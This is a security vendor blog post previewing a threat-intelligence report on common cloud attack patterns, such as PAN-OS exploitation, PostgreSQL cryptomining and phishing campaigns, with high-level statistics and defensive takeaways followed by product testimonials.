Wiz
Blog

Cloud Attacks Retrospective: Evolving Tactics, Familiar Entry Points

Let's break down eight attack patterns security teams should be watching in 2025.

Wiz Threat Research
1 minute read

Cloud environments are growing more complex—but attackers aren’t necessarily getting more advanced. Instead, they’re applying creativity to familiar weaknesses: misconfigurations, unpatched systems, and credential misuse. 

That’s the key theme in Wiz’s newly released Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025, a data-driven analysis of real-world cloud attacks based on detections across thousands of environments. The report maps eight of the most frequently observed MITRE ATT&CK techniques to specific threat campaigns, CVEs, and persistent trends across the cloud ecosystem. 

Here’s a preview of what stood out: 

 

Following the disclosure of CVE-2024-0012 and CVE-2024-9474 in PAN-OS, Wiz observed attackers deploying web shells and Sliver implants just days after PoCs went public. 

  • 24% of monitored environments contained vulnerable PAN-OS appliances 

  • 7% were internet-facing and exploitable via unauthenticated RCE 

These cases show how quickly attackers pivot from disclosure to exploitation—especially when edge infrastructure is exposed. 

The CPU_HU campaign targeted weak PostgreSQL configurations, exploiting default or guessable credentials to deploy cryptominers

  • 90% of cloud environments analyzed use self-managed PostgreSQL 

  • Nearly one-third had at least one instance exposed publicly 

This underscores how foundational hardening steps—like restricting access and enforcing credential policies—remain critical. 

Phishing remains the top cause of identity-based cloud breaches. 

  • 0ktapus used spoofed SSO portals to harvest credentials 

  • Atlas Lion employed adversary-in-the-middle proxies and smishing to bypass MFA 

Even with modern defenses, user-targeted phishing continues to yield high success rates in cloud environments. 

Persistence is no longer an afterthought—it’s embedded from the start.

  • In Redis and Jenkins environments, attackers used cron jobs to relaunch cryptominers on reboot 

  • Selenium Grid instances without authentication were abused to execute payloads via browser automation 

Simple, resilient techniques continue to evade detection—especially when deployed on services with limited monitoring. 

What’s inside the full report? 

The Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025 includes: 

  • Detailed analysis of the top MITRE ATT&CK techniques abused by actors in the cloud 

  • Real-world incidents tied to specific CVEs, misconfigurations, and IAM abuse 

  • Campaigns involving Diicot, Bapak, 0ktapus, and more 

  • Practical guidance on how to detect and disrupt attack chains in your environment

Read the full Cloud Attack Retrospective Report

Drawing from detection data across thousands of organizations, we highlight eight commonly observed MITRE ATT&CK techniques and offer practical guidance on how Wiz can help to detect and mitigate them.

Download

Tags
#Research#Threat Intel

Continue reading

Get a personalized demo

Ready to see Wiz in action?

“Best User Experience I have ever seen, provides full visibility to cloud workloads.”
David EstlickCISO
“Wiz provides a single pane of glass to see what is going on in our cloud environments.”
Adam FletcherChief Security Officer
“We know that if Wiz identifies something as critical, it actually is.”
Greg PoniatowskiHead of Threat and Vulnerability Management
Get a demo